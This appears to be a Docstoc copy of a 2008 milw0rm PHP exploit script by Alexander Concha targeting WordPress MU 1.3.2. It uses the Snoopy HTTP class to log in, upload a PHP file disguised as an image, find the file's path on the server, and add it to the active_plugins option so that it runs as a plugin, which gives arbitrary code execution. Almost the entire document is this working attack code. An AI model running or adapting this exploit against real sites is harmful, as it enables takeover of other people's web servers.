Docstoc

Wordpress MU 1.3.2 active_plugins option Code Execution Exploit

Document Sample
Wordpress MU 1.3.2 active_plugins option Code Execution Exploit Powered By Docstoc
					                      Wordpress MU 1.3.2 active_plugins option Code Execution Exploit           Page 1/2
  1    <?php
  2    /*
  3    WordPress [MU] blog’s options overwrite
  4
  5    Credits : Alexander Concha <alex at buayacorp dot com>
  6    Website : http://www.buayacorp.com/
  7    Advisory: http://www.buayacorp.com/files/wordpress/wordpress−mu−options−overwrite.html
  8
  9    This exploit uses active_plugins option to execute arbitrary PHP
  10   */
  11   include_once ’./class−snoopy.php’;
  12
  13   // Fix Snoopy
  14   class SnoopyExt extends Snoopy {
  15           function _prepare_post_body($formvars, $formfiles) {
  16                   if ( is_string($formvars) ) {
  17                           return $formvars;
  18                   }
  19                   return parent::_prepare_post_body($formvars, $formfiles);
  20           }
  21   }
  22
  23   set_time_limit( 0 );
  24
  25   // Any user with ’manage_options’ and ’upload_files’ capabilities
  26   $user = ’user’;
  27   $pass = ’1234’;
  28   $blog_url = ’http://localhost.localdomain/mu/’;
  29   $remote_file = ’’; // relative path to wp−content
  30   $local_file = ’’; // the contents of this file, if any, will be uploaded
  31
  32   $snoopy = new SnoopyExt();
  33
  34   $snoopy−>maxredirs = 0;
  35   $snoopy−>cookies[’wordpress_test_cookie’] = ’WP+Cookie+check’;
  36   $snoopy−>submit("{$blog_url}wp−login.php", array(’log’ => $user, ’pwd’ => $pass));
  37
  38   $snoopy−>setcookies(); // Set auth cookies for future requests
  39
  40   if ( empty($remote_file) ) {
  41           // Upload a new file
  42           $snoopy−>_submit_type = ’image/gif’;
  43           $snoopy−>submit("{$blog_url}wp−app.php?action=/attachments", get_contents());
  44
  45            if ( preg_match(’#<id>([^<]+)</id>#i’, $snoopy−>results, $match) ) {
  46                    $remote_file = basename($match[1]);
  47            }
  48   }
  49   if ( empty($remote_file) ) die(’Exploit failed...’);
  50
  51   // Look for real path
  52   $snoopy−>fetch("{$blog_url}wp−admin/export.php?download");
Alexander Concha                                                                                02/05/2008
                      Wordpress MU 1.3.2 active_plugins option Code Execution Exploit                                            Page 2/2
  53
  54   if ( preg_match("#<wp:meta_value>(.*$remote_file)</wp:meta_value>#", $snoopy−>results, $match) ) {
  55           $remote_file = preg_replace(’#.*?wp−content#’, ’’, $match[1]);
  56   }
  57   if ( empty($remote_file) ) die(’Exploit failed...’);
  58
  59   // It asumes that file uploads are stored within wp−content
  60   $remote_file = ’../’ . ltrim($remote_file, ’/’);
  61
  62   $snoopy−>fetch("{$blog_url}wp−admin/plugins.php");
  63
  64   // Recover previous active plugins
  65   $active_plugins = array();
  66   if ( preg_match_all(’#action=deactivate&([^\’]+)#’, $snoopy−>results, $matches) ) {
  67             foreach ($matches[0] as $plugin) {
  68                     if ( preg_match(’#plugin=([^&]+)#’, $plugin, $match) )
  69                               $active_plugins[] = urldecode($match[1]);
  70             }
  71             print_r($active_plugins);
  72   }
  73   $active_plugins[] = $remote_file;
  74
  75   // Fetch a valid nonce
  76   $snoopy−>fetch("{$blog_url}wp−admin/options−general.php");
  77
  78   if ( preg_match(’#name=._wpnonce. value=.([a−z\d]{10}).#’, $snoopy−>results, $match) ) {
  79
  80            // Finally update active_plugins
  81            $snoopy−>set_submit_normal();
  82            $snoopy−>submit("{$blog_url}wp−admin/options.php",
  83                    array(
  84                            ’active_plugins’ => $active_plugins,
  85                            ’_wpnonce’ => $match[1],
  86                            ’action’ => ’update’,
  87                            ’page_options’ => ’active_plugins’,
  88                    ));
  89   }
  90
  91   function get_contents() {
  92           global $local_file;
  93
  94            return file_exists($local_file) ? file_get_contents($local_file) : ’<?php echo "Hello World " . __FILE__; ?>’;
  95   }
  96   ?>
  97
  98   # milw0rm.com [2008−02−05]




Alexander Concha                                                                                                                 02/05/2008

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:48
posted:5/23/2010
language:English
pages:2